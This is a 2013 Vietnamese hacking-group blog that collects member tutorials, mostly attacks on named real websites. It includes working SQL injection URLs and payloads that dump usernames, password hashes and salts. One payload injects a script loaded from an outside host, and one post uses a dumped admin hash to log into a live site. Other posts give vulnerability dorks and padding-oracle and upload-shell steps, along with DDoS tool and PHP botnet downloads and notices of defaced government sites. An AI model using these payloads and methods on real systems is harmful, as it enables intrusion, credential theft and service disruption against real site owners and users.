Sau không biết bao nhiêu sóng gió, bao nhiêu thăng trầm, bao lần on rồi off. Tài nguyên của VHB bị mất đi khá nhiều. Từ nay blog này sẽ là nơi tổng hợp các tutorial hay của tất các các thành viên VHB_Group. Hi vọng đây sẽ là 1 không gian lưu trữ, chia sẻ, học tập không chỉ cho các thành viên VHB_Group mà còn cho tất cả các bạn có niềm đam mê Hacking & Security cũng như Coding. Mong các bạn sẽ ủng hộ nhiệt tình Blog tutorial của Group và có thêm những kiến thức bổ ích tại Blog này!
Thứ Ba, 18 tháng 6, 2013
Chủ Nhật, 28 tháng 4, 2013
Cảnh báo về virus facebook đang hoành hành
- Trong đợt này thường xuyên có vài người inbox gởi đến 1 cái link : http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg
- Ex :
- Nhìn có vẻ là .jpg nhưng người làm ra con này sử dụng kỹ thuật extension thay đổi đuôi của file .
- Sau khi tải về tôi thử chạy nó và kết quả thì thấy ở facebook tôi đã tự động gởi 1 nội dung : "http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg" đến những người đã từng inbox với tôi
- Một hồi phân tích thì thằng làm ra con này cũng không phải tay vừa :D . Chả ai nghĩ 16kb của nó lại tạo ra được 1 file 67kb đâu :))
################################################## ######
# hầu như chỉ có vài AV phát hiện được . Tôi thử avira nhưng kết quả là không tìm thấy !
* Kết quả : http://chk4me.com/check/public/NTXx1...6ZF_M398DSOC1l
################################################## ######
################################################## ######
# Folder infection : C:\Documents and Settings\[User]\Application Data\ , Auto Startup
# File name : svchosts.exe, nig78.tmp.bat
################################################## ######
Cái ruột :
Tut By Midz
- Ex :
- Nhìn có vẻ là .jpg nhưng người làm ra con này sử dụng kỹ thuật extension thay đổi đuôi của file .
- Sau khi tải về tôi thử chạy nó và kết quả thì thấy ở facebook tôi đã tự động gởi 1 nội dung : "http://www.mediafire.com/?7zz9bjgakf1okjv/image9922.jpg" đến những người đã từng inbox với tôi
- Một hồi phân tích thì thằng làm ra con này cũng không phải tay vừa :D . Chả ai nghĩ 16kb của nó lại tạo ra được 1 file 67kb đâu :))
################################################## ######
# hầu như chỉ có vài AV phát hiện được . Tôi thử avira nhưng kết quả là không tìm thấy !
* Kết quả : http://chk4me.com/check/public/NTXx1...6ZF_M398DSOC1l
################################################## ######
################################################## ######
# Folder infection : C:\Documents and Settings\[User]\Application Data\ , Auto Startup
# File name : svchosts.exe, nig78.tmp.bat
################################################## ######
Cái ruột :
Tut By Midz
Thứ Năm, 18 tháng 4, 2013
Scan Victim bằng Metasploit
Mình đã viết một bài về Metasploit framwork rồi.
Phần này mình viết tiếp về nó.Dù nó ko liên quan gì lắm với nhau )
Phần này mình đề cập tiếp đến vấn đề scan mục tiêu cần attack đã nói trong phần trước.
Scan mục tiêu là vấn đề rất quan trọng.thu thập đc càng nhiều thông tin càng tốt.Chả thừa gì đối với chúng ta cả.
Trong metasploit framework có một module sử dụng bộ công cụ scan nmap .Trong quá trình họat động nó sử dụng giữ liệu thu đc bằng quá trình scan bởi nmap một cách tự động.
Như mình từng đề cập ở nhiều bài trước.Làm gì thì làm.Trước khi dùng mấy bộ công cụ này thì tốt nhất là nên update trước.Dữ liệu của nó cập nhật theo ngày.Nên update là ko thừa.
Step1: Vào msfconsole ,rồi type db_nmap
Phần này mình viết tiếp về nó.Dù nó ko liên quan gì lắm với nhau )
Phần này mình đề cập tiếp đến vấn đề scan mục tiêu cần attack đã nói trong phần trước.
Scan mục tiêu là vấn đề rất quan trọng.thu thập đc càng nhiều thông tin càng tốt.Chả thừa gì đối với chúng ta cả.
Trong metasploit framework có một module sử dụng bộ công cụ scan nmap .Trong quá trình họat động nó sử dụng giữ liệu thu đc bằng quá trình scan bởi nmap một cách tự động.
Như mình từng đề cập ở nhiều bài trước.Làm gì thì làm.Trước khi dùng mấy bộ công cụ này thì tốt nhất là nên update trước.Dữ liệu của nó cập nhật theo ngày.Nên update là ko thừa.
Step1: Vào msfconsole ,rồi type db_nmap
root@bt:~# msfconsole
msf > db_nmap
[*] Usage: db_nmap [nmap options]
Nhận đc thông báo nmap_option --> ta có thể sử dụng các option của nmap thông thường.
Thử scan victim nào đó nhé.Hộm nó mới có con shell trên honda67.com mấy mem up lên huynhdegroup.net.Hôm nay vào tên nào đã deface rồi.Nên lấy nó test luôn.
Ip của honda67.com là 112.78.2.15
msf > db_nmap 112.78.2.15
Fix bug SQLI Mod vB4 Gift Music
Bug này đã có exploit và bị khai thác triệt để nhưng vẫn chưa có ai đưa ra bản vá cho nó, hôm nay rảnh được chút thời gian nên mình làm cái tut cho oai chứ thật ra là đọc code và fix lỗi cho nó thôi kakaka.
cách fix bug này:
vào: Admincp -> Plugin & product option -> Plugin manage -> [HQTH]Music Gift -> [HQTH]Music Gift có hook misc_start -> edit (sửa) -> tìm dòng code dưới:
if($_GET[id]) $m = $vbulletin->db->query_first("SELECT * FROM ". TABLE_PREFIX
."hqth_music WHERE id = $_GET[id] AND pulish = 1");
if($_GET[id]) $m = $vbulletin->db->query_first("SELECT * FROM ". TABLE_PREFIX
."hqth_music WHERE id = '". stripslashes($_GET[id]) ."' AND pulish = 1"); /*fixed by ccb*/
vd:
("SELECT * FROM ". TABLE_PREFIX ."hqth_music WHERE id = $_GET[id] AND pulish = 1");
thì thay bằng:
("SELECT * FROM ". TABLE_PREFIX ."hqth_music WHERE id = '". stripslashes($_GET[id]) ."' AND pulish = 1");
nguồn: concobe - VHB - huynhdegroup.net
Tut by Concobe
SQLI Mod vB4 Gift Music
################################################## ####
# SQLI Mods vB4 Gift Music
# Google Dork: dork là misc.php?do=music_full&id=
# Exploit Author: GhostVN
################################################## ####
Exploitation:
http://domains.com/forum/misc.php?do=music_full&id=null
http://domains.com/forum/misc.php?do=music_full&id=20 UNION SELECT 1,group_concat(username,0x7c,password,0x7c,email,0 x7c,salt),3,4,5,6,7,8,9,10,11,12,13,14,15 from user where userid=1-- -
# SQLI Mods vB4 Gift Music
# Google Dork: dork là misc.php?do=music_full&id=
# Exploit Author: GhostVN
################################################## ####
Exploitation:
http://domains.com/forum/misc.php?do=music_full&id=null
http://domains.com/forum/misc.php?do=music_full&id=20 UNION SELECT 1,group_concat(username,0x7c,password,0x7c,email,0 x7c,salt),3,4,5,6,7,8,9,10,11,12,13,14,15 from user where userid=1-- -
Tut by GhostVN_VHB
Metasploit framework
Mình đã xem trên mạng.Tài liệu về Metasploit Framework tiếng việt khá ít.Và không đầy đủ.Nên mình viết lại những gì mình biết ,tham khảo thêm một số nguồn tiếng anh [ Mục đích là để giúp newbie biết rõ hơn ,và để làm tài liệu chính thức từ vhb,Không phải lấy từ nguồn khác.Có một bài kakavn_85 leech về vhb rồi.Nhưng bài đó khá sơ sài ,nên mình viết lại bài này].Hiện tại còn một số phần chưa hoàn thành.Anh em nào am hiểu về các module encoders module và Nops module trong metasploit framework thì pm yahoo mình icarus_ken.Để cùng mình biên soạn kĩ hơn về 2 phần này.
-Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode (payload) để tấn công máy có lỗ hổng.Cùng với một số bộ công cụ bảo mật khác,Metasploit có cơ sở dữ liệu chứa hàng ngàn shellcode ,hàng ngàn exploit của các hệ điều hành,các chương trình hay dịch vụ.Trong quá trình phát triển metasploit liên tục cập nhật các Exploit...Nên càng ngày nó càng trở thành một bộ công cụ mạnh mẽ.
-Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn (pentesting ) nhưng đối với những attacker như chúng ta,thì nó thực sự là một công cụ vô cùng hữu ích ( dùng để kiểm tra ,khai thác lỗi ,exploit ).Thực sự theo mình nghĩ thì ai muốn làm hacker (hay script kidie đi chăng nữa ) thì cũng nên bỏ thời gian ra nghiên cứu kĩ về nó.
-Nói sơ qua Metasploit framework là một phần nhỏ của dự án Metaspoit ( đc xây dựng từ ngôn ngữ perl sau đó đc viết lại bằng ruby.Đúng ra là chủ yếu bằng ruby).
Bộ metasploit framwork hỗ trợ giao diện cho nguời dùng dưới nhiều dạng
- -Console interface : Dùng lệnh msfconsole .Đa số thao tác bằng dòng lệnh.
- -GUI -armitage : Dùng Armitage để vào.Đây là giao diện đồ họa.
- -Command line interface : dùng lệnh msfcli để vào
Một số Tool DDOS
-Anonymous DoSer http://www.mediafire.com/?rrbmmms8c62jymr
- Anonymous External Attack http://www.mediafire.com/?49imnv3wh5fa4b5
-ByteDOS v3.2 http://www.mediafire.com/?ecbjw425kl4xtoj
-Hoic Vercion v2.1 http://www.mediafire.com/?q7jzd7z991z7k82
-LOIC http://www.mediafire.com/?79b5xqa10ddcnro
-PoWeRFuL DoSeR http://www.mediafire.com/?04q00er3z54kmzr
-Jays Booter http://www.mediafire.com/?q5ba9kb0cwuu5c5
-Site_Hog_v1_Release http://www.mediafire.com/?m9627jc0v2i12vd
-SYN-Flood-DOS http://www.mediafire.com/?jzax9kg4dhn1y6v
-Turbinas VolkSv1 http://www.mediafire.com/?af5f3fezzcxaabn
-rDos + Port Scanner http://www.mediafire.com/?juvcot3l11llt1x
-GoodBye v3.0 http://www.mediafire.com/?zyam8r9i05qb3kc
-Unicorn Booter (Download Link Available Soon)
-Joker IP Reserve Tool http://www.mediafire.com/?48vkvi3cgns5pa8
Tut by Vohinh95
Bug Topx vBB
Rảnh rỗi làm cái TUT này. Hi vọng giúp ích được cho các NewBie như mình của VHB.
Link Download:
END TUT!
Tut by KyoBin
Video Clip Hack Server FPT Telecom
Chào anh VHB, tối qua trongkhang98 mới làm video clip về Hacking attack WebServer FPT, post lên cho anh em tham khảo!
Nếu thấy hay thì thanks tinh thần ủng hộ VHB. Trong Tut có dùng tools "Crack Mật Khẩu thần chưởng" của X-T và mong Soliel sẽ post bài bên blog!
Trong Video có rất nhiều CSDL, anh em nào cần có thể xem xét qua, nhưng
tuyệt đối không nên gây ảnh hưởng đến sự hoạt động của hệ thống nhé! Cảm
ơn VHB Family!
Tut By Trongkhang98
Nếu thấy hay thì thanks tinh thần ủng hộ VHB. Trong Tut có dùng tools "Crack Mật Khẩu thần chưởng" của X-T và mong Soliel sẽ post bài bên blog!
Click vào hình ảnh trên nhé
Tut By Trongkhang98
Code Botnet PhP version beta
/**************************
* BOTNET VERSION BETA *
* CODE BY VNDRAGON - VHB *
* *
**************************/
Lúc trưa lên VHB ngồi đọc cái 2pic phần tích Tools DDOS gì đó, ngồi lên cái ý tưởng tại sao ta lại không phát triển botnet qua con đường php nhỉ.
Lên được ý tưởng mất buổi chiều để vọc cho ra cái version beta này. Code chỉ mang tính chất minh họa cho ý tưởng của mình, bạn nào có hứng thú thì pmm yh binhkiendb hợp tác phát triển tiếp nghen. Hoan nghên mọi sự hợp tác của các bạn.
Pass unrar: vndragon.vhb
link: http://www.mediafire.com/?cxg5g1b465dv6ln
---------- Post added at 07:22 PM ---------- Previous post was at 07:19 PM ----------
Up cái demo:
Tut By: VnDragon
Code send mail nặc danh
Rảnh rổi viết cái này cho anh em dùng cho vui, sẳn xài cái tools mã hóa
của pác Leo share, mình mã hóa file lại tại vì mún mọi người có ai dùng
thì nhớ công mình ấy mà ^^.
demo :
---- Cách sử dụng: down file về rùi up lên host nào đó rùi chạy, lưu ý vì ở đây có xài hàm mail nên anh em chọn host nào thì chọn đừng chọn host dis hàm mail rồi bảo sao không thấy gì nha !
---- Phần nội dung gửi anh em xài code html cho ok nhé, để cho đoạn nội dung xuống dòng khuyên nên dùng thẻ <p>Nội dung</p> thay vì dùng "Nội dung </br>".
link down:http://www.mediafire.com/?1dpvh544z6795m7
pass:eagle
Tut by Eagle
demo :
---- Cách sử dụng: down file về rùi up lên host nào đó rùi chạy, lưu ý vì ở đây có xài hàm mail nên anh em chọn host nào thì chọn đừng chọn host dis hàm mail rồi bảo sao không thấy gì nha !
---- Phần nội dung gửi anh em xài code html cho ok nhé, để cho đoạn nội dung xuống dòng khuyên nên dùng thẻ <p>Nội dung</p> thay vì dùng "Nội dung </br>".
link down:http://www.mediafire.com/?1dpvh544z6795m7
pass:eagle
Tut by Eagle
Thứ Ba, 9 tháng 4, 2013
Thứ Năm, 4 tháng 4, 2013
Man in the middle Attack
Phương pháp tấn công đc hình dung qua chính cái tên gọi của nó.Là một
phương pháp cơ bản và làm nền tảng chung cho nhiều kĩ thuật tấn công.Ở
đây attacker đóng vai trò là người trung gian,đứng giữa,giả mạo trong
phiên làm việc giữa victim và một máy chủ nào đó.Mọi gói tin xuất phát
từ victim đến máy chủ hay ngược lại đề đi qua máy attacker ,nếu đc
attacker forward .
Xem mô hình dưới đây:
Xem mô hình dưới đây:
Ta thấy attacker đã chèn vào giữa phiên giao dịch của victim và máy
chủ.Vậy làm sao attacker làm đc điều này.Và các công cụ sniffer dùng
phương pháp MITM như thế nào.
Đầu tiên nói sơ qua cơ chế giao tiếp bình thường giữa victim và máy chủ khi attacker chưa tác động lên hệ thống.Khi 2 host giao tiếp với nhau,chúng cần địa chỉ nguồn và địa chỉ đích đến.Và do hiện nay người ta dùng các giao thức khác nhau trên tầng giao vận(IP,IPX) ,chính vì thế dẫn đến việc không thống nhất đối với các thiết bị .Có thể thiết bị này tương thích nhưng thiết bị khác lại không.Chính vì vậy sinh ra việc dùng ip MAC.Xem như là một tiêu chuẩn chung tương thích với các thiết bị khác nhau.Nhưng làm sao để từ IP có thể phiên ra ip MAC và ngược lại.Việc phiên dịch này là do giao thức ARP (address resolution protocol) thực hiện.
Đầu tiên nói sơ qua cơ chế giao tiếp bình thường giữa victim và máy chủ khi attacker chưa tác động lên hệ thống.Khi 2 host giao tiếp với nhau,chúng cần địa chỉ nguồn và địa chỉ đích đến.Và do hiện nay người ta dùng các giao thức khác nhau trên tầng giao vận(IP,IPX) ,chính vì thế dẫn đến việc không thống nhất đối với các thiết bị .Có thể thiết bị này tương thích nhưng thiết bị khác lại không.Chính vì vậy sinh ra việc dùng ip MAC.Xem như là một tiêu chuẩn chung tương thích với các thiết bị khác nhau.Nhưng làm sao để từ IP có thể phiên ra ip MAC và ngược lại.Việc phiên dịch này là do giao thức ARP (address resolution protocol) thực hiện.
Thứ Tư, 3 tháng 4, 2013
Thứ Ba, 2 tháng 4, 2013
Cảnh báo dansodaklak.gov.vn
http://dansodaklak.gov.vn/vhb.txt
Website đã bị tấn công, có thể can thiệp vào souce và cơ sở dữ liệu.
Cảnh báo tandbinhphuoc.gov.vn
http://tandbinhphuoc.gov.vn/vhb.txt
Website đã bị tấn công, có thể can thiệp vào souce và cơ sở dữ liệu.
Cách login khi không decode đc md5 đối với 1 số site
Cách login khi không decode đc md5 đối với 1 số site
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá
1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.
Yêu cầu:
+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự
2. Trước tiên là tìm User,Pass:
http://traanh.vn/?frame=product_deta...m%20tbl_user--
Tình hình là thử đối với các site decode MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.
Thay vì bỏ, thì còn phương án sau.
3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):
http://traanh.vn/admin/
4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.
Đến đây có lẽ vấn đề đã được giải quyết:
+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)
Video:
Video hướng dẫn
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá
1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.
Yêu cầu:
+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự
2. Trước tiên là tìm User,Pass:
http://traanh.vn/?frame=product_deta...m%20tbl_user--
1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Thay vì bỏ, thì còn phương án sau.
3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):
http://traanh.vn/admin/
4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.
Đến đây có lẽ vấn đề đã được giải quyết:
+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)
Video:
Video hướng dẫn
Tut by: Leorius
[ SQLI ] Magic convert
Victim: http://nchla.org/
Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.
Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz
Pass mediafire và winrar: vhb
Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.
Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz
Pass mediafire và winrar: vhb
[ SQLI ] SQLI site TQ
Lang thang trên mạng tình cờ kiếm được em Tàu làm cái tut sqli
Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb
Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection
P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.
Tut by: S019ua
Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb
Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection
P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.
Tut by: S019ua
[ Exploit ] Inferno vBShout SQLI 0day <= 2.5.2
Vào coi exploit-db.com có cái này hay nên làm lun cái tut cho anh em coi.
Đầu tiên vào google.vn search dork sau :
Ra được 1 nùi site. Mình chọn site này làm Victim :
http://www.cinemekan.com/infernoshout.php?do=options&area=commands
Ô Command Input nhập :
Ô Command Output thì nhập cái gì cũng được. Sau đó nhấn Save Settings
Sau đó nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .
Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.
tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ
Tut By X-T
Đầu tiên vào google.vn search dork sau :
Code:
inurl:infernoshout.php?do=options&area=commands
http://www.cinemekan.com/infernoshout.php?do=options&area=commands
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,
password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x
from information_schema.tables group by x)a) AND ''='#
Sau đó nhấn Ctrl + U trên bàn phím. Và kéo xuống dưới cùng sẽ ra 1 trang chứa thông thông user + password+ salt của nó .
Xong bây h chúng ta có thể login bằng cookie vào được tài khoản admin rùi.
tut ngắn gọn, có gì sai mong được mọi người góp ý. Chúc mọi người thành công và vui vẻ
Tut By X-T
[ SQLI ] khai thác SQL với Javascript
Làm bài tut khai thác SQL bằng javascript cho anh em đỡ mỏi tay
file javascript
các bác tải về để sẵn khi nào dùng , lỡ em nó die
đoạn script
Video TUT
file javascript
các bác tải về để sẵn khi nào dùng , lỡ em nó die
đoạn script
concat((0x3c736372697074207372633d22687474703a2f2f 6875757461692e6e65742f73716c692e6a73223e3c2f736372 6970743e))volcano
concat((0x<script src="http://huutai.net/sqli.js"></script>))volcano
Thực hành hacking trên WebGoat
Hi a e trong VHB, mình thấy mọi người trong VHB rất có hứng thú với
Hacking. Hôm nay mình sẽ giới thiệu cho a e về WebGoat - 1 trang web a e
có thể thực hành hack với những lỗi phổ biến nhất XSS, SQL
và cũng sẽ có những hướng dẫn chi tiết nhất cho các bạn về lỗi đó và hướng giải quyết cho a e
Ai biết rồi thì thôi nhé, ko quăng gạch đá kẻo vỡ đầu >"<
Ở đây mình đã include hết các thứ rồi, các bạn chỉ cần đem về giải nén rồi ném folder xampp vào ở C hay D gì cũng được để vào cho dễ nhé
Link downoad:
http://www.mediafire.com/?4um44qlgki17efi
http://www.mediafire.com/?1bawsz253izt4s4
Pass: vhb_zaizaiqa
và cũng sẽ có những hướng dẫn chi tiết nhất cho các bạn về lỗi đó và hướng giải quyết cho a e
Ai biết rồi thì thôi nhé, ko quăng gạch đá kẻo vỡ đầu >"<
Ở đây mình đã include hết các thứ rồi, các bạn chỉ cần đem về giải nén rồi ném folder xampp vào ở C hay D gì cũng được để vào cho dễ nhé
Link downoad:
http://www.mediafire.com/?4um44qlgki17efi
http://www.mediafire.com/?1bawsz253izt4s4
Pass: vhb_zaizaiqa
Tut By: zaizaiqa
[ LFI ]tổng hợp 1 số TUT về LFI
Sql thì không cần phải bàn cãi, nó xuất hiện quá nhiều và mọi người thường xuyên sử dụng nó để khai thác lỗi, ngoài sql ra vẫn còn nhiều lỗi khá thông dụng, trong đó có lỗi LFI mà a e ta có chiều hướng bỏ qua chọn sql cho đỡ lằng nhằng, sau đây là 1 số TUT mà mình đã tổng hợp qua nhiều nguồn và chọn lọc các TUT hay và ý nghĩa, hy vọng qua đó a e có thể có 1 cái nhìn khác về lỗi LFI này
Pass download: w0lf
Tut by: w0lf
[ XSS ] Tut XSS Mp3.zing.vn
http://www.mediafire.com/?e5kooae23jyyiiz
Pass: vnhack
Demo Online: http://tinyurl.com/8h5wvmm
Tutorial tấn công Cross Site Scripting.
Victim: Mp3.zing.vn
Mô tả: Bypass filter đơn giản + kết hợp event trong HTML để thực thi script.
P/S: qua TUT này có thể phát triển để tấn công phishing hoặc social engineering hacking nếu biết vận dụng.
TUT này đã làm tut ảnh rồi, mà giờ làm lại video cho dể hiểu cách view source bypass filter với vận dụng chút kiến thức HTML căn bản thôi .
Enjoy it.
Pass: vnhack
Demo Online: http://tinyurl.com/8h5wvmm
Tutorial tấn công Cross Site Scripting.
Victim: Mp3.zing.vn
Mô tả: Bypass filter đơn giản + kết hợp event trong HTML để thực thi script.
P/S: qua TUT này có thể phát triển để tấn công phishing hoặc social engineering hacking nếu biết vận dụng.
TUT này đã làm tut ảnh rồi, mà giờ làm lại video cho dể hiểu cách view source bypass filter với vận dụng chút kiến thức HTML căn bản thôi .
Enjoy it.
Thứ Hai, 1 tháng 4, 2013
Kho Video Học Hacking
Tổng hợp các kho video hacking chủ yếu là SQLI, Upshell và Local Attack từ trước đến nay
http://up.4share.vn/d/5e6f6b686a6e6768
http://up.4share.vn/d/2312141610121412
http://www.mediafire.com/?pm55krbicizbc
Một Số Diễn Đàn Hacking Và UG
I - TRong Nước:
I.1 - 4rum Hacking:
http://forums.vniss.net/index.php
http://www.hvaonline.net/hvaonline/forums/list.hva
http://ceh.vn/
http://xgrvn.net/
http://beyeugroup.net/BYG/
http://vhbgroup.net/
http://hcegroup.us
http://hkv.cc/HKV/index.php
http://hvh.vn/
http://botnetvietnam.com/UG/forum.php
http://vietmatrix.net
http://mumauden.net
http://hacker.yakuza112.org/679-Diendancrack.html
http://hacker.yakuza112.org/339-Reaonline.html
http://www.vhcteam.net
http://www.diendancrack.com/
http://diendancracker.com/
http://idhteam.forum-pro.org/
I.2 - Blog Hacking
http://ducdung08clc.blogspot.com/
http://junookyo.blogspot.com
http://home.huydiet.vn/
http://ughabi.blogspot.com/
http://mkhahero.blogspot.com
http://kmasecurity.blogspot.com
http://rootbiez.blogspot.com/'
http://kechocgianvn.blogspot.com
http://satthuo.blogspot.com/
http://dark.ctu.vn
http://lehieuit.blogspot.com/
http://www.tmt-today.com/
http://ah7z.blogspot.com/
http://www.tamhon.net/
http://vinakid.blogspot.com/
http://www.haixinh.com/
I.3 - UG:
http://www.localvn.biz/4all/
http://groupug.us/@/
http://vnhack.us/
http://vnw.cc/forum/
http://dfno1.com/df/
http://nbteam.us/@/index.php
http://hkv.cc/HKV/
http://lamviec12h.blogspot.com
I.1 - 4rum Hacking:
http://forums.vniss.net/index.php
http://www.hvaonline.net/hvaonline/forums/list.hva
http://ceh.vn/
http://xgrvn.net/
http://beyeugroup.net/BYG/
http://vhbgroup.net/
http://hcegroup.us
http://hkv.cc/HKV/index.php
http://hvh.vn/
http://botnetvietnam.com/UG/forum.php
http://vietmatrix.net
http://mumauden.net
http://hacker.yakuza112.org/679-Diendancrack.html
http://hacker.yakuza112.org/339-Reaonline.html
http://www.vhcteam.net
http://www.diendancrack.com/
http://diendancracker.com/
http://idhteam.forum-pro.org/
I.2 - Blog Hacking
http://ducdung08clc.blogspot.com/
http://junookyo.blogspot.com
http://home.huydiet.vn/
http://ughabi.blogspot.com/
http://mkhahero.blogspot.com
http://kmasecurity.blogspot.com
http://rootbiez.blogspot.com/'
http://kechocgianvn.blogspot.com
http://satthuo.blogspot.com/
http://dark.ctu.vn
http://lehieuit.blogspot.com/
http://www.tmt-today.com/
http://ah7z.blogspot.com/
http://www.tamhon.net/
http://vinakid.blogspot.com/
http://www.haixinh.com/
I.3 - UG:
http://www.localvn.biz/4all/
http://groupug.us/@/
http://vnhack.us/
http://vnw.cc/forum/
http://dfno1.com/df/
http://nbteam.us/@/index.php
http://hkv.cc/HKV/
http://lamviec12h.blogspot.com
Ebooks Hacking Chọn Lọc
Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ.
1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng
viêtk
Tài liệu này được viết bởi cutynhangheo - Admin HCE theo kiểu biên dịch lại từ Ebook
tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack
nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.
2 – Tấn công và bảo vệ
hệ thống
Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo
mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết
rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay
quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet –
Trojan-Backdoor, Gmail Hacking, Website Hacking ...
3 – Elite Collection
HVA
Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các
các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản
xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry,
How to be a Hacker...
4 – Ghi Nhớ Ubuntu
Ebook ghi nhớ các
lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu,
tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.
5 - The Hacker's Underground Handbook
Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay
quanh hacking như : programming, linux, password, Network Hacking, Wireless
Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết
– Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm
dolla.
1 số Ebook khác:
-
Ebook Group HCE - Hacking + Crack = Enjoin
-
Ebook Group BYG – BeYeuGroup
-
CEH version tiêng việt
-
The Web Application Hacker’s Handbook
-
Hacker Web Exploitation
-
CEH V.7 - Certified Ethical Hacker
-
CHFI - Computer Hacking Forensic
Investigator
http://www.mediafire.com/?4kwnoo0jji5p95v
Tất cả các password download là: soleil_vhb
Vì mới comeback nên soleil cũng chưa tổng hợp được đầy đủ tất cả các tài liệu hay trên giới hacking, tuy nhiên topic này sẽ được cập nhật thường xuyên ^^
Chủ Nhật, 31 tháng 3, 2013
IIS - Exploit
IIS
Hacking là kỹ thuật hack website dễ nhất bằng cách upload shell lên hệ
thống website. Hiện nay người dùng chủ yếu sử dụng hệ điều hành win 7,
Vì vậy soleil sẽ chỉ demo IIS hacking trên win 7.
Bước 1: Vào My Computer, click chuột phải và chọn Add a network Location
Chọn Next
DNN - DotNet Nuke
Bước 1: Sử dụng google để tìm site chứa lỗ
hổng DNN
:inurl:/tabid/36/language/en-US/Default.aspxInurl:”/portals/0”
Bước 2: Chọn 1 victim bất kỳ, ví dụ:
Bước 3: Thay thế đoạn url
sau:
/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lúc đó, đường link của victim
như sau:
Thông tin thu được:
Padding Orale Attack
Victim: http://bigc.vn/
Kiểm tra lỗi Padding Orale
View source:
Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500"
Bước 1: Chuẩn bị
Tools
Trước tiên cần
cài đặt perl:
Coppy 2 file
padBuster.pl và Web.config_bruter.pl sau vào ổ C:
padBuster.pl:
Web.config_bruter.pl:
pass unlock: soleil_vhb
pass giải nén: ceh.vn
[ Up Shell ]Up Shell Voi NuKeViet
[ Up Shell ] Kỹ Thuật Upshell Đối Với Joomla P.II
Bài trước soleil đã đề cập cách thức upload shell đối với joomla qua thư mục upload ảnh.
http://ducdung08clc.blogspot.com/2012/02/ky-thuat-upshell-oi-voi-joomla.html
Tuy nhiên một số site bị cấm quyền upload hoặc bị chặn bởi file .htacess làm cho shell không chạy được hay một số lý do nào khác.
